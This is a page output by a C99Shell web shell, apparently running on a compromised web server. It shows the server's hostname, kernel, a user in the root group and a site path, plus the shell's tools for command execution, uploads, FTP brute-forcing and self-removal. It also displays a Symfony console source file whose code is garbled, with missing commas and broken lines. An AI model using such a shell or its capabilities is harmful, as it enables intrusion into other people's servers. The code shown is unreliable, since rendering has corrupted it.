!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/symfony/console/Command/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LazyCommand.php (5.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Console\Command;

use 
Symfony\Component\Console\Application;
use 
Symfony\Component\Console\Completion\CompletionInput;
use 
Symfony\Component\Console\Completion\CompletionSuggestions;
use 
Symfony\Component\Console\Helper\HelperSet;
use 
Symfony\Component\Console\Input\InputDefinition;
use 
Symfony\Component\Console\Input\InputInterface;
use 
Symfony\Component\Console\Output\OutputInterface;

/**
 * @author Nicolas Grekas <p@tchwork.com>
 */
final class LazyCommand extends Command
{
    private 
$command;
    private 
$isEnabled;

    public function 
__construct(string $name, array $aliasesstring $descriptionbool $isHidden\Closure $commandFactory, ?bool $isEnabled true)
    {
        
$this->setName($name)
            ->
setAliases($aliases)
            ->
setHidden($isHidden)
            ->
setDescription($description);

        
$this->command $commandFactory;
        
$this->isEnabled $isEnabled;
    }

    public function 
ignoreValidationErrors(): void
    
{
        
$this->getCommand()->ignoreValidationErrors();
    }

    public function 
setApplication(Application $application null): void
    
{
        if (
$this->command instanceof parent) {
            
$this->command->setApplication($application);
        }

        
parent::setApplication($application);
    }

    public function 
setHelperSet(HelperSet $helperSet): void
    
{
        if (
$this->command instanceof parent) {
            
$this->command->setHelperSet($helperSet);
        }

        
parent::setHelperSet($helperSet);
    }

    public function 
isEnabled(): bool
    
{
        return 
$this->isEnabled ?? $this->getCommand()->isEnabled();
    }

    public function 
run(InputInterface $inputOutputInterface $output): int
    
{
        return 
$this->getCommand()->run($input$output);
    }

    public function 
complete(CompletionInput $inputCompletionSuggestions $suggestions): void
    
{
        
$this->getCommand()->complete($input$suggestions);
    }

    
/**
     * @return $this
     */
    
public function setCode(callable $code): self
    
{
        
$this->getCommand()->setCode($code);

        return 
$this;
    }

    
/**
     * @internal
     */
    
public function mergeApplicationDefinition(bool $mergeArgs true): void
    
{
        
$this->getCommand()->mergeApplicationDefinition($mergeArgs);
    }

    
/**
     * @return $this
     */
    
public function setDefinition($definition): self
    
{
        
$this->getCommand()->setDefinition($definition);

        return 
$this;
    }

    public function 
getDefinition(): InputDefinition
    
{
        return 
$this->getCommand()->getDefinition();
    }

    public function 
getNativeDefinition(): InputDefinition
    
{
        return 
$this->getCommand()->getNativeDefinition();
    }

    
/**
     * @return $this
     */
    
public function addArgument(string $nameint $mode nullstring $description ''$default null): self
    
{
        
$this->getCommand()->addArgument($name$mode$description$default);

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function addOption(string $name$shortcut nullint $mode nullstring $description ''$default null): self
    
{
        
$this->getCommand()->addOption($name$shortcut$mode$description$default);

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function setProcessTitle(string $title): self
    
{
        
$this->getCommand()->setProcessTitle($title);

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function setHelp(string $help): self
    
{
        
$this->getCommand()->setHelp($help);

        return 
$this;
    }

    public function 
getHelp(): string
    
{
        return 
$this->getCommand()->getHelp();
    }

    public function 
getProcessedHelp(): string
    
{
        return 
$this->getCommand()->getProcessedHelp();
    }

    public function 
getSynopsis(bool $short false): string
    
{
        return 
$this->getCommand()->getSynopsis($short);
    }

    
/**
     * @return $this
     */
    
public function addUsage(string $usage): self
    
{
        
$this->getCommand()->addUsage($usage);

        return 
$this;
    }

    public function 
getUsages(): array
    {
        return 
$this->getCommand()->getUsages();
    }

    
/**
     * @return mixed
     */
    
public function getHelper(string $name)
    {
        return 
$this->getCommand()->getHelper($name);
    }

    public function 
getCommand(): parent
    
{
        if (!
$this->command instanceof \Closure) {
            return 
$this->command;
        }

        
$command $this->command = ($this->command)();
        
$command->setApplication($this->getApplication());

        if (
null !== $this->getHelperSet()) {
            
$command->setHelperSet($this->getHelperSet());
        }

        
$command->setName($this->getName())
            ->
setAliases($this->getAliases())
            ->
setHidden($this->isHidden())
            ->
setDescription($this->getDescription());

        
// Will throw if the command is not correctly initialized.
        
$command->getDefinition();

        return 
$command;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--